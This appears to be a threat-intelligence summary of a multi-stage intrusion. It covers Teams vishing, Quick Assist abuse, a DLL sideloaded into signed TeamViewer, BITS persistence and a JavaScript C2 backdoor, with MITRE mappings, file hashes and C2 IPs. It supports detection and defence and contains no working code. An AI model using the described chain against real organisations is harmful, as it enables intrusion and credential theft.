FOCUS MODE
EXTRACT IOC
Threat Research

Signed Sideloaded Compromised

Securonix
Signed Sideloaded Compromised
This article outlines a sophisticated multi-stage cyber attack characterized by the use of vishing, remote access tools, and legitimate software exploitation to gain unauthorized access and maintain persistence. The attack involved delivering malicious payloads through Microsoft Teams, using Quick Assist for remote access, and deploying malware including TeamViewer and a JavaScript-based command and control backdoor. The findings emphasize the risks associated with social engineering and the implications for cybersecurity defenses. Affected: organizations, individuals, cybersecurity environment

Keypoints :

  • A multi-stage attack leveraging vishing and remote access tools was observed.
  • The attack utilized Microsoft Teams for delivering a PowerShell payload.
  • Quick Assist was exploited for unauthorized remote access.
  • Signed binaries like TeamViewer and a malicious DLL were deployed.
  • The attack culminated in the use of a JavaScript-based C2 backdoor.
  • The incident highlights social engineering vulnerabilities in organizations.
  • Common techniques observed align with tactics attributed to the threat actor Storm-1811.
  • Persistence mechanisms such as BITS jobs and generated LNK files were used.

MITRE Techniques :

  • T1105 – Ingress Tool Transfer | Adversary transfers tools to target system such as TeamViewer.exe.
  • T1656 – Impersonation | Adversary impersonates IT/help desk personnel in executing the attack.
  • T1018 – Remote System Discovery | Uses nltest and net user for domain reconnaissance.
  • T1219 – Remote Access Software | Exploitation of remote support tools like Quick Assist and TeamViewer.
  • T1218 – Signed Binary Proxy Execution | Abusing trusted signed binaries to sideload malicious DLLs.
  • T1197 – BITS Jobs | Employed for stealthy data transfers or persistence using BITS.
  • T1555.003 – Credentials from Web Browsers | Accessing browser password files for credential theft.
  • T1021.002 – SMB/Windows Admin Shares | Utilization of psexec.exe for lateral movement and execution.
  • T1570 – Lateral Tool Transfer | Copying tools such as psexec.exe across multiple systems.
  • T1090 – C2 via Reverse Proxy | Use of PsExec to exfiltrate data.

Indicator of Compromise :

  • [SHA256] 904280f20d697d876ab90a1b74c0f22a83b859e8b0519cb411fda26f1642f53e (TeamViewer.exe)
  • [SHA256] 782e997382734a4c80b6f2c6aef51a55c9434457f5ee125a3cf5938ec7a72f55 (TV.dll)
  • [SHA256] 67199aaa4c7c9a7002958588b1bd1b81deecec871933f7c88d5838deb1c47e92 (index.js)
  • [IP Address] 5.252.153.81 (Final C2 Node.js Server)
  • [IP Address] 5.252.153.244 (Initial Tool Delivery Server)

Full Story: https://www.ontinue.com/resource/blog-signed-sideloaded-compromised/

Tags: LATERAL MOVEMENT, COLLECTION, DISCOVERY, PAYLOAD, BACKDOOR, BROWSER, CREDENTIAL, MDR